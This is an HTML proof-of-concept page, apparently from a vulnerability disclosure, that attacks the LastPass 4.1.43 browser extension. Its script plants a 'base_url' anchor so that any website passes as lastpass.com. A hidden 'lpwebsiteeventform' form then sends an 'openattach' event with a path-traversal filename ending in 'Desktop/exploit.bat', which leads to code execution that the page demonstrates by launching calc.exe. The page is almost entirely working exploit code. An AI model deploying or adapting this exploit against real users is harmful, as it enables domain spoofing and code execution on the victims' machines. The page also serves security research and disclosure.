<html>
|
<head>
|
<script>
|
function start() {
|
x = document.createElement("a");
|
x.setAttribute("id", "base_url");
|
x.setAttribute("href", "//" + document.location.hostname);
|
document.body.appendChild(x);
|
// exploit.submit();
|
}
|
</script>
|
</head>
|
<body onload="start()">
|
|
<title>LastPass 4.1.43 Exploit</title>
|
</head>
|
<body>
|
<p>
|
It's possible to convince LastPass 4.1.43 that any website is the privileged
|
domain lastpass.com, because LastPass incorrectly assumed that global
|
properties couldnt be set across isolated worlds.
|
<br/>
|
<br/>
|
If you have the "<a href="https://lastpass.com/support.php?cmd=showfaq&id=3206">Binary Component</a>" installed, this even allows arbitrary code execution.
|
Full details <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=1225">here</a>.
|
<br/>
|
<br/>
|
Click the button below to run calc.exe (This demo is Windows w/Chrome only, but other platforms and browsers are affected).
|
<br/>
|
<br/>
|
</p>
|
<button onclick="exploit.submit()">
|
Run Calc
|
</button>
|
<br/>
|
<br/>
|
<p>
|
<a href="bin.png"><img width="35%" src=bin.png></a>
|
|
<exploit id="g_loosebasematching" />
|
<form id="exploit" name="lpwebsiteeventform">
|
<input type="hidden" name="eventtype" value="openattach">
|
<input type="hidden" name="eventdata1" value="d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec">
|
<input type="hidden" name="eventdata2" value="!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==">
|
<input type="hidden" name="eventdata3" value="other:./../../../../../Desktop/exploit.bat">
|
<form>
|
</body>
|
</html>
|
|